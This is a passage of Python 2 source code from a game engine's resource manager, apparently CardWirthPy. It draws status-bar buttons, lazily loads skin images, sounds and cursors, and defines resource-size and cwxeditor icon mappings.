            r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1,128, r1,g1,b1,255, r1,g1,b1,255, r1,g1,b1,255,
            r1,g1,b1, 0, r1,g1,b1,196, r1,g1,b1,224, r1,g1,b1,128, r1,g1,b1, 68, r1,g1,b1, 40,
            r1,g1,b1,128, r1,g1,b1,224, r1,g1,b1, 68, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
            r1,g1,b1,255, r1,g1,b1,128, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
            r1,g1,b1,255, r1,g1,b1, 68, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
            r1,g1,b1,255, r1,g1,b1, 40, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0
        )
        hl_topleft = pygame.image.fromstring(linedata, (6, 6), "RGBA")
        hl_topright = pygame.transform.flip(hl_topleft, True, False)
        hl_bottomleft = pygame.transform.flip(hl_topleft, False, True)
        hl_bottomright = pygame.transform.flip(hl_topleft, True, True)
        color = (r1, g1, b1)
        pygame.draw.line(bmp, color, (2+6, 2), (w-6-3, 2))
        pygame.draw.line(bmp, color, (2+6, h-3), (w-6-3, h-3))
        pygame.draw.line(bmp, color, (2, 2+6), (2, h-6-3))
        pygame.draw.line(bmp, color, (w-3, 2+6), (w-3, h-6-3))
        bmp.blit(hl_topleft, (2, 2))
        bmp.blit(hl_topright, (w-6-2, 2))
        bmp.blit(hl_bottomleft, (2, h-6-2))
        bmp.blit(hl_bottomright, (w-6-2, h-6-2))
    if flags & SB_NOTICE:
        # Tint the whole button towards red for the notification state.
        if flags & SB_PRESSED:
            bmp.fill((64, 0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
        else:
            bmp.fill((128, 0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
        bmp.fill((0, 96, 96, 0), special_flags=pygame.locals.BLEND_RGBA_SUB)
    # Make the area outside the frame transparent.
    Resource.draw_corneroutimg(bmp, outframe=1)
    pygame.draw.rect(bmp, (0, 0, 0, 0), (0, 0, w, h), 1)
    return bmp
def get_statusbtnbmp(self, sizetype, flags=0):
    """Return a copy of a cached StatusBar button image.

    sizetype: 0=(120, 22), 1=(26, 29), 2=(633+1, 34) (pre-scaling units).
    flags: bitwise OR of 0 (normal), SB_PRESSED (held down),
           SB_CURRENT (under the cursor), SB_DISABLE, SB_NOTICE.
    The image for each (sizetype, flags) pair is created on first
    request and cached; callers always receive a private copy.
    """
    btn = None
    if sizetype == 0:
        cache = self._statusbtnbmp0
        if flags not in cache:
            cache[flags] = self._create_statusbtnbmp(cw.s(120), cw.s(22), flags)
        btn = cache[flags]
    elif sizetype == 1:
        cache = self._statusbtnbmp1
        if flags not in cache:
            cache[flags] = self._create_statusbtnbmp(cw.s(26), cw.s(29), flags)
        btn = cache[flags]
    elif sizetype == 2:
        cache = self._statusbtnbmp2
        if flags not in cache:
            cache[flags] = self._create_statusbtnbmp(cw.s(633)+1, cw.s(34), flags)
        btn = cache[flags]
    return btn.copy() if btn else None
def get_resources(self, func, dpath1, dpath2, ext, mask=None, ss=None, noresize=(), nodbg=False, emptyfunc=None,
                  editor_res=None, warning=True):
    """
    Return a lazily-loading table of resources.
    The key is the file name without its extension.

    func: loader callable (e.g. cw.util.load_image).
    dpath1: fallback directory ("Data/SkinBase/...").
    dpath2: skin directory, searched before dpath1.
    ext: preferred file extension passed to find_resource.
    mask: forwarded to the loader; None means call the loader with the
          path only.
    ss: scaling function applied to the loaded resource.
    noresize: keys that must not be scaled.
    nodbg: when True, the "_dbg" key suffix is not treated specially.
    emptyfunc: factory for the placeholder returned when loading fails.
    editor_res: optional cwxeditor resource directory, searched first.
    warning: show an error dialog when a resource is missing.
    """
    def nokeyfunc(key):
        # Loader invoked the first time an unknown key is requested.
        # "_dbg" / "_noscale" suffixes select DPI handling and are
        # stripped from the lookup key.
        dbg = not nodbg and key.endswith("_dbg")
        noscale = key.endswith("_noscale")
        up_scr = None
        fpath = ""
        if dbg:
            key = key[:-len("_dbg")]
            up_scr = cw.dpi_level
        if noscale:
            key = key[:-len("_noscale")]
        if editor_res:
            # Prefer the cwxeditor icon when a mapping exists.
            resname = CWXEDITOR_RESOURCES.get(key, "")
            fpath = cw.util.join_paths(editor_res, resname)
            if not os.path.isfile(fpath):
                fpath = ""
        if not fpath and dpath2:
            fpath = cw.util.find_resource(cw.util.join_paths(dpath2, key), ext)
        if not fpath:
            fpath = cw.util.find_resource(cw.util.join_paths(dpath1, key), ext)
        if not fpath:
            if warning:
                # Report on the UI thread via the frame's exec_func.
                def errfunc(dname, key):
                    if cw.cwpy.frame:
                        s = u"リソース [%s/%s] が見つかりません。" % (dname, key)
                        dlg = cw.dialog.message.ErrorMessage(None, s)
                        dlg.ShowModal()
                        dlg.Destroy()
                cw.cwpy.frame.exec_func(errfunc, os.path.basename(dpath1), key)
            return emptyfunc()
        if mask is None:
            res = func(fpath)
        else:
            if ss == cw.ppis and func == cw.util.load_wxbmp:
                res = func(fpath, mask=mask, can_loaded_scaledimage=True, up_scr=cw.dpi_level)
            else:
                res = func(fpath, mask=mask, can_loaded_scaledimage=True, up_scr=up_scr)
        if not noscale:
            if not dbg and ss and not key in noresize:
                res = ss(res)
            elif dbg and ss:
                res = cw.ppis(res)
        return res
    d = ResourceTable(dpath1, {}.copy(), emptyfunc, nokeyfunc=nokeyfunc)
    return d
def get_sounds(self, setting, skinsounds):
    """
    Load the system sound effects and return them as a
    ResourceTable of pygame sound instances.
    """
    table = ResourceTable("SystemSound", {}.copy(), empty_sound)
    for key, sound in setting.sounds.items():
        if sound not in skinsounds:
            table.set(key, empty_sound)
            continue
        def bind(name):
            # Bind 'name' now to avoid the late-binding closure pitfall.
            table.set(key, lambda: skinsounds[name])
        bind(sound)
    return table
def get_skinsounds(self):
    """
    Load the skin's bundled sound effects and return them as a
    ResourceTable of pygame sound instances.
    """
    table = self.get_resources(cw.util.load_sound, "Data/SkinBase/Sound",
                               cw.util.join_paths(self.skindir, "Sound"),
                               self.ext_snd, emptyfunc=empty_sound, warning=False)
    extra = self.get_resources(cw.util.load_sound, "Data/SkinBase/BgmAndSound",
                               cw.util.join_paths(self.skindir, "BgmAndSound"),
                               self.ext_snd, emptyfunc=empty_sound, warning=False)
    table.merge(extra)
    return table
def get_msgs(self, setting):
    """
    Return the system messages as a dict (delegates to the setting
    object, which owns the loaded messages).
    """
    return setting.msgs
def get_buttons(self):
    """
    Load the dialog button images and return them as a table of
    wx.Bitmap instances.
    """
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Button")
    return self.get_resources(cw.util.load_wxbmp, "Data/SkinBase/Resource/Image/Button", dpath, self.ext_img, True, cw.wins, emptyfunc=empty_wxbmp)
def get_cursors(self):
    """
    Load the cursors used by dialogs and return them as a table of
    wx.Cursor instances.
    """
    def load_cursor(name):
        # Prefer a .cur file from the skin or SkinBase; otherwise fall
        # back to the matching stock cursor.
        fname = name + ".cur"
        for dpath in ("Data/SkinBase/Resource/Image/Cursor",
                      cw.util.join_paths(self.skindir, "Resource/Image/Cursor")):
            fpath = cw.util.join_paths(dpath, fname)
            if os.path.isfile(fpath):
                return wx.Cursor(fpath, wx.BITMAP_TYPE_CUR)
        if name == "CURSOR_BACK":
            return wx.StockCursor(wx.CURSOR_POINT_LEFT)
        if name == "CURSOR_FORE":
            return wx.StockCursor(wx.CURSOR_POINT_RIGHT)
        if name == "CURSOR_FINGER":
            return wx.StockCursor(wx.CURSOR_HAND)
        # "CURSOR_ARROW" and every unknown name map to the null cursor.
        return wx.NullCursor
    return ResourceTable("Resource/Image/Cursor", {}.copy(),
                         lambda: wx.StockCursor(wx.CURSOR_ARROW), nokeyfunc=load_cursor)
def get_stones(self):
    """
    Load the aptitude / remaining-uses images and return them as a
    table of pygame surfaces.
    """
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Stone")
    return self.get_resources(cw.util.load_image, "Data/SkinBase/Resource/Image/Stone", dpath, self.ext_img, True, cw.s, emptyfunc=empty_image)
def get_wxstones(self):
    """
    Load the aptitude / remaining-uses images and return them as a
    table of wx.Bitmap instances.
    """
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Stone")
    return self.get_resources(cw.util.load_wxbmp, "Data/SkinBase/Resource/Image/Stone", dpath, self.ext_img, True, cw.wins, emptyfunc=empty_wxbmp)
def get_statuses(self, load_image):
    """
    Load the images used by the status display and return them as a
    table ("LIFEGUAGE", "TARGET", "LIFE", "UP*" and "DOWN*" are masked).
    The element type (wx.Bitmap / pygame.Surface) follows load_image.
    """
    if load_image == cw.util.load_wxbmp:
        scaler = cw.wins
        placeholder = empty_wxbmp
    else:
        scaler = cw.s
        placeholder = empty_image
    def load_status(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
        # Apply per-key masking rules on top of the raw loader.
        key = os.path.splitext(os.path.basename(fpath))[0]
        if key in ("LIFE", "UP0", "UP1", "UP2", "UP3", "DOWN0", "DOWN1", "DOWN2", "DOWN3"):
            return load_image(fpath, mask=True, maskpos=(1, 1), can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        if key == "TARGET":
            return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        if key == "LIFEGUAGE":
            return load_image(fpath, mask=True, maskpos=(5, 5), can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        if key in ("LIFEGUAGE2", "LIFEGUAGE2_MASK"):
            return load_image(fpath, mask=True, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        # "LIFEBAR" and every other key load unmasked.
        return load_image(fpath, mask=False, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Status")
    return self.get_resources(load_status, "Data/SkinBase/Resource/Image/Status", dpath, self.ext_img, False, scaler, emptyfunc=placeholder)
def get_dialogs(self, load_image):
    """
    Load the images used by dialogs and return them as a table.
    The element type (wx.Bitmap / pygame.Surface) follows load_image.
    """
    if load_image == cw.util.load_wxbmp:
        ss = cw.wins
        emptyfunc=empty_wxbmp
    else:
        ss = cw.s
        emptyfunc=empty_image
    def load_image2(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
        # Apply per-key masking rules on top of the raw loader.
        fname = os.path.basename(fpath)
        key = os.path.splitext(fname)[0]
        if key in ("LINK", "MONEYY"):
            return load_image(fpath, mask=False, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        elif key == "STATUS8":
            return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        elif key in ("CAUTION", "INVISIBLE"):
            # Loader default masking is used for these keys.
            return load_image(fpath, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        else:
            return load_image(fpath, mask=mask, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Dialog")
    return self.get_resources(load_image2, "Data/SkinBase/Resource/Image/Dialog", dpath, self.ext_img, True, ss, emptyfunc=emptyfunc)
def get_debugs(self, load_image, ss):
    """
    Load the images used by the debugger and return them as a table.
    The element type (wx.Bitmap / pygame.Surface) follows load_image.
    ss: scaling function applied to each image.
    """
    if load_image == cw.util.load_wxbmp:
        emptyfunc=empty_wxbmp
    else:
        emptyfunc=empty_image
    dpath = u"Data/Debugger"
    # When possible, load the icons from cwxeditor/resource instead.
    editor_res = os.path.dirname(os.path.abspath(self.setting().editor))
    editor_res = cw.util.join_paths(editor_res, "resource")
    if not os.path.isdir(editor_res):
        editor_res = None
    return self.get_resources(load_image, dpath, "", cw.M_IMG, True, ss, emptyfunc=emptyfunc, editor_res=editor_res)
def get_cardbgs(self, load_image):
    """
    Load the card background images and return them as a table
    ("PREMIER", "RARE", "HOLD" and "PENALTY" are masked).
    The element type (wx.Bitmap / pygame.Surface) follows load_image.
    """
    if load_image == cw.util.load_wxbmp:
        ss = cw.wins
        emptyfunc=empty_wxbmp
    else:
        ss = cw.s
        emptyfunc=empty_image
    def load_image2(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
        # Apply per-key masking rules on top of the raw loader.
        fname = os.path.basename(fpath)
        key = os.path.splitext(fname)[0]
        if key in ("HOLD", "PENALTY"):
            return load_image(fpath, mask=True, maskpos="center", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        elif key in ("PREMIER", "RARE"):
            return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
        else:
            return load_image(fpath, mask=mask, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/CardBg")
    return self.get_resources(load_image2, "Data/SkinBase/Resource/Image/CardBg", dpath, self.ext_img, False, ss, nodbg=True, emptyfunc=emptyfunc)
def get_cardnamecolorhints(self, cardbgs):
    """
    For each card background, build a table mapping the background key
    to the averaged color of the area where the card name is drawn.
    """
    d = ResourceTable("CardBgColorHints", {}.copy(), lambda: 255)
    for key in ("ACTION", "BEAST", "BIND", "DANGER", "FAINT", "INFO", "INJURY", "ITEM",
                "LARGE", "NORMAL", "OPTION", "PARALY", "PETRIF", "SKILL", "SLEEP"):
        # The extra lambda layer binds 'key' by value, avoiding the
        # late-binding closure pitfall inside the loop.
        f = lambda key: d.set(key, lambda: self.calc_cardnamecolorhint(cardbgs[key]))
        f(key)
    return d
def calc_cardnamecolorhint(self, bmp):
    """Return the averaged byte value of the name-drawing area of a
    pygame surface, or None when the image is too small to contain it.
    """
    if bmp.get_width() <= cw.s(10) or bmp.get_height() <= cw.s(20):
        return
    rect = pygame.Rect(cw.s(5), cw.s(5), bmp.get_width() - cw.s(10), cw.s(15))
    sub = bmp.subsurface(rect)
    buf = pygame.image.tostring(sub, "RGB")
    buf = array.array('B', buf)
    rgb = sum(buf) / len(buf)  # Python 2: integer (floor) division
    return rgb
def calc_wxcardnamecolorhint(self, wxbmp):
    """Return the averaged byte value of the name-drawing area of a
    wx.Bitmap, or None when the image is too small to contain it.
    """
    if wxbmp.GetWidth() <= cw.s(10) or wxbmp.GetHeight() <= cw.s(20):
        return
    rect = wx.Rect(cw.s(5), cw.s(5), wxbmp.GetWidth() - cw.s(10), cw.s(15))
    sub = wxbmp.GetSubBitmap(rect)
    # Pre-sized RGB buffer (Python 2: '\0' * n is a byte string).
    buf = array.array('B', '\0' * (rect[2] * rect[3] * 3))
    sub.CopyToBuffer(buf, format=wx.BitmapBufferFormat_RGB)
    rgb = sum(buf) / len(buf)  # Python 2: integer (floor) division
    return rgb
def get_actioncards(self):
    """
    Load the action cards under "Resource/Xml/ActionCard" and return
    a dict of cw.header.CardHeader instances keyed by card id.
    """
    dpath = cw.util.join_paths(self.skindir, "Resource/Xml/ActionCard")
    headers = {}
    for fname in os.listdir(dpath):
        if not fname.endswith(".xml"):
            continue
        carddata = cw.data.xml2element(cw.util.join_paths(dpath, fname))
        header = cw.header.CardHeader(carddata=carddata)
        headers[header.id] = header
    return headers
def get_backpackcards(self):
    """
    Load "Resource/Xml/SpecialCard/UseCardInBackpack.xml" and return
    a dict of cw.header.CardHeader instances keyed by card type.
    """
    fpath = cw.util.join_paths(self.skindir, "Resource/Xml/SpecialCard/UseCardInBackpack.xml")
    if not os.path.isfile(fpath):
        # Old skins do not bundle the file, so fall back to SkinBase.
        fpath = u"Data/SkinBase/Resource/Xml/SpecialCard/UseCardInBackpack.xml"
    carddata = cw.data.xml2element(fpath)
    headers = {}
    for cardtype in ("ItemCard", "BeastCard"):
        bgtype = cardtype.upper().replace("CARD", "")
        headers[cardtype] = cw.header.CardHeader(carddata=carddata, bgtype=bgtype)
    return headers
def get_specialchars(self):
    """
    Load the special-character glyph images and return them as a
    table of pygame surfaces keyed by the escape sequence
    ("#a", "#b", ...).
    """
    self.specialchars_is_changed = False
    dpath = cw.util.join_paths(self.skindir, "Resource/Image/Font")
    # image file name -> special-character escape sequence
    ndict = {"ANGRY" : "#a",
             "CLUB" : "#b",
             "DIAMOND" : "#d",
             "EASY" : "#e",
             "FLY" : "#f",
             "GRIEVE" : "#g",
             "HEART" : "#h",
             "JACK" : "#j",
             "KISS" : "#k",
             "LAUGH" : "#l",
             "NIKO" : "#n",
             "ONSEN" : "#o",
             "PUZZLE" : "#p",
             "QUICK" : "#q",
             "SPADE" : "#s",
             "WORRY" : "#w",
             "X" : "#x",
             "ZAP" : "#z",
             }
    d = ResourceTable("Resource/Image/Font", {}.copy(), empty_image)
    def load(key, name):
        # NOTE(review): 'name' is unused here but kept so d.set can
        # pass both arguments; the trailing False presumably marks the
        # glyph as "not user-modified" — confirm against callers.
        fpath = cw.util.find_resource(cw.util.join_paths(dpath, key), self.ext_img)
        image = cw.util.load_image(fpath, mask=True, can_loaded_scaledimage=True)
        return image, False
    for key, name in ndict.iteritems():
        d.set(name, load, key, name)
    return d
# Standard (pre-scaling) sizes of the skin resources.
SIZE_SPFONT = (22, 22)
SIZE_RESOURCES = {
    "Button/ARROW": (16, 16),
    "Button/BEAST": (65, 45),
    "Button/CAST": (16, 16),
    "Button/DECK": (16, 16),
    "Button/DOWN": (14, 14),
    "Button/ITEM": (65, 45),
    "Button/LJUMP": (16, 14),
    "Button/LMOVE": (9, 14),
    "Button/LSMALL": (9, 9),
    "Button/RJUMP": (16, 14),
    "Button/RMOVE": (9, 14),
    "Button/RSMALL": (9, 9),
    "Button/SACK": (16, 16),
    "Button/SHELF": (16, 16),
    "Button/SKILL": (65, 45),
    "Button/TRUSH": (16, 16),
    "Button/UP": (14, 14),
    "CardBg/ACTION": (80, 110),
    "CardBg/BEAST": (80, 110),
    "CardBg/BIND": (95, 130),
    "CardBg/DANGER": (95, 130),
    "CardBg/FAINT": (95, 130),
    "CardBg/HOLD": (80, 110),
    "CardBg/INFO": (80, 110),
    "CardBg/INJURY": (95, 130),
    "CardBg/ITEM": (80, 110),
    "CardBg/LARGE": (95, 130),
    "CardBg/NORMAL": (80, 110),
    "CardBg/OPTION": (80, 110),
    "CardBg/PARALY": (95, 130),
    "CardBg/PENALTY": (80, 110),
    "CardBg/PETRIF": (95, 130),
    "CardBg/PREMIER": (12, 16),
    "CardBg/RARE": (12, 40),
    "CardBg/REVERSE": (95, 130),
    "CardBg/SKILL": (80, 110),
    "CardBg/SLEEP": (95, 130),
    "Dialog/CAUTION": (37, 37),
    "Dialog/COMPLETE": (100, 100),
    "Dialog/FIXED": (26, 26),
    "Dialog/FOLDER": (64, 54),
    "Dialog/INVISIBLE": (232, 29),
    "Dialog/LINK": (20, 20),
    "Dialog/MONEYP": (18, 18),
    "Dialog/MONEYY": (18, 18),
    "Dialog/PAD": (226, 132),
    "Dialog/PLAYING": (68, 146),
    "Dialog/PLAYING_YADO": (68, 146),
    "Dialog/SELECT": (16, 13),
    "Dialog/SETTINGS": (16, 16),
    "Dialog/STATUS": (220, 56),
    "Dialog/STATUS0": (14, 14),
    "Dialog/STATUS1": (14, 14),
    "Dialog/STATUS2": (14, 14),
    "Dialog/STATUS3": (14, 14),
    "Dialog/STATUS4": (14, 14),
    "Dialog/STATUS5": (14, 14),
    "Dialog/STATUS6": (14, 14),
    "Dialog/STATUS7": (14, 14),
    "Dialog/STATUS8": (14, 14),
    "Dialog/STATUS9": (14, 14),
    "Dialog/STATUS10": (14, 14),
    "Dialog/STATUS11": (14, 14),
    "Dialog/STATUS12": (14, 14),
    "Dialog/STATUS13": (14, 14),
    "Dialog/UTILITY": (128, 24),
    "Other/TITLE": (406, 99),
    "Other/TITLE_CARD1": (124, 134),
    "Other/TITLE_CARD2": (124, 134),
    "Other/TITLE_CELL1": (133, 30),
    "Other/TITLE_CELL2": (133, 46),
    "Other/TITLE_CELL3": (406, 99),
    "Status/BODY0": (16, 16),
    "Status/BODY1": (16, 16),
    "Status/DOWN0": (16, 16),
    "Status/DOWN1": (16, 16),
    "Status/DOWN2": (16, 16),
    "Status/DOWN3": (16, 16),
    "Status/LIFE": (16, 16),
    "Status/LIFEBAR": (158, 11),
    "Status/LIFEGUAGE": (79, 13),
    "Status/LIFEGUAGE2": (79, 13),
    "Status/LIFEGUAGE2_MASK": (79, 13),
    "Status/MAGIC0": (16, 16),
    "Status/MAGIC1": (16, 16),
    "Status/MAGIC2": (16, 16),
    "Status/MAGIC3": (16, 16),
    "Status/MIND0": (16, 16),
    "Status/MIND1": (16, 16),
    "Status/MIND2": (16, 16),
    "Status/MIND3": (16, 16),
    "Status/MIND4": (16, 16),
    "Status/MIND5": (16, 16),
    "Status/SUMMON": (16, 16),
    "Status/TARGET": (24, 22),
    "Status/UP0": (16, 16),
    "Status/UP1": (16, 16),
    "Status/UP2": (16, 16),
    "Status/UP3": (16, 16),
    "Stone/HAND0": (14, 14),
    "Stone/HAND1": (14, 14),
    "Stone/HAND2": (14, 14),
    "Stone/HAND3": (14, 14),
    "Stone/HAND4": (14, 14),
    "Stone/HAND5": (14, 14),
    "Stone/HAND6": (14, 14),
    "Stone/HAND7": (14, 14),
    "Stone/HAND8": (14, 14),
    "Stone/HAND9": (14, 14),
}

def get_resourcesize(path):
    """Return the standard size of the resource at path, or None.

    The lookup key is "<parent directory name>/<file name without
    its extension>".
    """
    parent = os.path.basename(os.path.dirname(path))
    stem = os.path.splitext(os.path.basename(path))[0]
    return SIZE_RESOURCES.get("%s/%s" % (parent, stem))
# Mapping from files in Data/Debugger to their counterparts in
# cwxeditor/resource. Resources with no counterpart are omitted.
CWXEDITOR_RESOURCES = {
    "AREA": "area.png",
    "BATTLE": "battle.png",
    "CARD": "cards.png",
    "COMPSTAMP": "end.png",
    "COUPON": "coupon_plus.png",
    "EDITOR": "cwxeditor.png",
    "EVENT": "event_tree.png",
    "LOCAL_FLAG": "flag_l.png",
    "FRIEND": "cast.png",
    "GOSSIP": "gossip.png",
    "IGNITION": "def_start.png",
    "INFO": "info.png",
    "KEYCODE": "key_code.png",
    "LOAD": "open.png",
    "MEMBER": "party_cards.png",
    "MONEY": "money.png",
    "PACK": "package.png",
    "RECOVERY": "msn_heal.png",
    "RESET": "reload.png",
    "ROUND": "round.png",
    "SAVE": "save.png",
    "UPDATE": "refresh.png",
    "LOCAL_STEP": "step_l.png",
    "LOCAL_VARIANT": "variant_l.png",
    "VARIABLES": "flagdir.png",
    # Terminal
    "EVT_START": "evt_start.png", # start
    "EVT_START_BATTLE": "evt_battle.png", # start battle
    "EVT_END": "evt_clear.png", # scenario clear
    "EVT_END_BADEND": "evt_gameover.png", # defeat / game over
    "EVT_CHANGE_AREA": "evt_area.png", # move to area
    "EVT_EFFECT_BREAK": "evt_stop.png", # break effect
    "EVT_LINK_START": "evt_link_s.png", # link to start
    "EVT_LINK_PACKAGE": "evt_link_p.png", # link to package
    # Standard
    "EVT_TALK_MESSAGE": "evt_message.png", # message
    "EVT_TALK_DIALOG": "evt_speak.png", # speech
    "EVT_PLAY_BGM": "evt_bgm.png", # change BGM
    "EVT_PLAY_SOUND": "evt_se.png", # sound effect
    "EVT_CHANGE_BGIMAGE": "evt_back.png", # change background
    "EVT_ELAPSE_TIME": "evt_time.png", # elapse time
    "EVT_EFFECT": "evt_effect.png", # effect
    "EVT_WAIT": "evt_wait.png", # wait (blank time)
    "EVT_CALL_PACKAGE": "evt_call_p.png", # call package
    "EVT_CALL_START": "evt_call_s.png", # call start
    "EVT_CHANGE_ENVIRONMENT": "evt_chenv.png", # set environment (Wsn.4)
    # Data
    "EVT_BRANCH_FLAG": "evt_br_flag.png", # flag branch
    "EVT_SET_FLAG": "evt_flag_set.png", # set flag
    "EVT_REVERSE_FLAG": "evt_flag_r.png", # reverse flag
    "EVT_CHECK_FLAG": "evt_flag_judge.png", # check flag
    "EVT_BRANCH_MULTISTEP": "evt_br_step_n.png", # multi-way step branch
    "EVT_BRANCH_STEP": "evt_br_step_ul.png", # step upper/lower branch
    "EVT_SET_STEPUP": "evt_step_plus.png", # increase step
    "EVT_SET_STEPDOWN": "evt_step_minus.png", # decrease step
    "EVT_SET_STEP": "evt_step_set.png", # set step
    "EVT_CHECK_STEP": "evt_check_step.png", # check step
    "EVT_BRANCH_FLAGVALUE": "evt_cmpflag.png", # flag comparison branch
    "EVT_BRANCH_STEPVALUE": "evt_cmpstep.png", # step comparison branch
    "EVT_SUBSTITUTE_FLAG": "evt_cpflag.png", # substitute flag
    "EVT_SUBSTITUTE_STEP": "evt_cpstep.png", # substitute step
    "EVT_SET_VARIANT": "evt_set_var.png", # set variant (Wsn.4)
    "EVT_BRANCH_VARIANT": "evt_br_var.png", # variant branch (Wsn.4)
    "EVT_CHECK_VARIANT": "evt_chk_var.png", # check variant (Wsn.4)
    # Utility
    "EVT_BRANCH_SELECT": "evt_br_member.png", # select member
    "EVT_BRANCH_ABILITY": "evt_br_power.png", # ability check branch
    "EVT_BRANCH_RANDOM": "evt_br_random.png", # random branch
    "EVT_BRANCH_MULTIRANDOM": "evt_br_multi_random.png", # multi-way random branch
    "EVT_BRANCH_LEVEL": "evt_br_level.png", # level check branch
    "EVT_BRANCH_STATUS": "evt_br_state.png", # status check branch
    "EVT_BRANCH_PARTYNUMBER": "evt_br_num.png", # party size check
    "EVT_BRANCH_AREA": "evt_br_area.png", # area branch
    "EVT_BRANCH_BATTLE": "evt_br_battle.png", # battle branch
    "EVT_BRANCH_ISBATTLE": "evt_br_on_battle.png", # in-battle check branch
    "EVT_BRANCH_ROUND": "evt_br_round.png", # round branch
    "EVT_BRANCH_RANDOMSELECT": "evt_br_rndsel.png", # random select
    # Branch
    "EVT_BRANCH_CAST": "evt_br_cast.png", # cast present branch
    "EVT_BRANCH_ITEM": "evt_br_item.png", # item possession branch
    "EVT_BRANCH_SKILL": "evt_br_skill.png", # skill possession branch
    "EVT_BRANCH_INFO": "evt_br_info.png", # info possession branch
    "EVT_BRANCH_BEAST": "evt_br_beast.png", # beast present branch
    "EVT_BRANCH_MONEY": "evt_br_money.png", # money branch
    "EVT_BRANCH_COUPON": "evt_br_coupon.png", # coupon branch
    "EVT_BRANCH_MULTI_COUPON": "evt_br_multi_coupon.png", # multi-way coupon branch
    "EVT_BRANCH_COMPLETESTAMP": "evt_br_end.png", # completed-scenario branch
    "EVT_BRANCH_GOSSIP": "evt_br_gossip.png", # gossip branch
    "EVT_BRANCH_KEYCODE": "evt_br_keycode.png", # keycode possession branch
    # Get
    "EVT_GET_CAST": "cast.png", # cast joins
    "EVT_GET_ITEM": "item.png", # get item
    "EVT_GET_SKILL": "skill.png", # get skill
    "EVT_GET_INFO": "info.png", # get info
    "EVT_GET_BEAST": "beast.png", # get beast
    "EVT_GET_MONEY": "money.png", # gain money
    "EVT_GET_COUPON": "coupon.png", # gain coupon (title)
    "EVT_GET_COMPLETESTAMP": "end.png", # set completed-scenario stamp
    "EVT_GET_GOSSIP": "gossip.png", # add gossip
    # Lost
    "EVT_LOSE_CAST": "evt_lost_cast.png", # cast leaves
    "EVT_LOSE_ITEM": "evt_lost_item.png", # lose item
    "EVT_LOSE_SKILL": "evt_lost_skill.png", # lose skill
    "EVT_LOSE_INFO": "evt_lost_info.png", # lose info
    "EVT_LOSE_BEAST": "evt_lost_beast.png", # lose beast
    "EVT_LOSE_MONEY": "evt_lost_money.png", # lose money
    "EVT_LOSE_COUPON": "evt_lost_coupon.png", # remove coupon
    "EVT_LOSE_COMPLETESTAMP": "evt_lost_end.png", # remove completed-scenario stamp
    "EVT_LOSE_GOSSIP": "evt_lost_gossip.png", # remove gossip
    # Visual
    "EVT_SHOW_PARTY": "evt_show_party.png", # show party
    "EVT_HIDE_PARTY": "evt_hide_party.png", # hide party
    "EVT_MOVE_BGIMAGE": "evt_mv_back.png", # reposition background
    "EVT_MOVE_CARD": "evt_mv_card.png", # reposition card
    "EVT_REPLACE_BGIMAGE": "evt_rpl_back.png", # replace background
    "EVT_LOSE_BGIMAGE": "evt_lose_back.png", # remove background
    "EVT_REDISPLAY": "evt_refresh.png", # rebuild the screen
}
def empty_wxbmp():
    """Return a fully masked (empty) 1x1 wx.Bitmap."""
    bitmap = wx.EmptyBitmap(1, 1)
    img = bitmap.ConvertToImage()
    # Mask out the single pixel so the bitmap renders as empty.
    img.SetMaskColour(img.GetRed(0, 0), img.GetGreen(0, 0), img.GetBlue(0, 0))
    return img.ConvertToBitmap()
def empty_image():
    """Return an empty (fully color-keyed) 1x1 pygame.Surface."""
    surface = pygame.Surface((1, 1)).convert()
    # Key out the single pixel so the surface draws as transparent.
    surface.set_colorkey(surface.get_at((0, 0)), pygame.locals.RLEACCEL)
    return surface
def empty_sound():
    """Return an empty (silent) cw.util.SoundInterface."""
    return cw.util.SoundInterface(None, "")
class LazyResource(object):
    def __init__(self, func, args, kwargs):
        """Lazily load a resource via func(*args, **kwargs).

        The result is cached after the first access; 'load' records
        whether loading was attempted and 'failure' whether it raised.
        """
        self.func = func
        self.args = args
        self.kwargs = kwargs
        self._res = None
        self.load = False
        self.failure = False

    def clear(self):
        # Drop the cached value so the next get_res() reloads it.
        self.load = False
        self._res = None

    def get_res(self):
        """Return the resource, loading it on first access.

        On failure the traceback is logged, 'failure' is set and None
        is cached as the result.
        """
        if not self.load:
            try:
                self._res = self.func(*self.args, **self.kwargs)
            except Exception:
                # BUGFIX: was a bare "except:", which also swallowed
                # SystemExit and KeyboardInterrupt.
                cw.util.print_ex(file=sys.stderr)
                self.failure = True
            self.load = True
        return self._res


class ResourceTable(object):
    def __init__(self, name, init={}.copy(), deffunc=None, nokeyfunc=None):
        """A string-keyed resource table with lazy loading.

        name: table name used in error messages.
        init: initial {key: LazyResource} mapping.
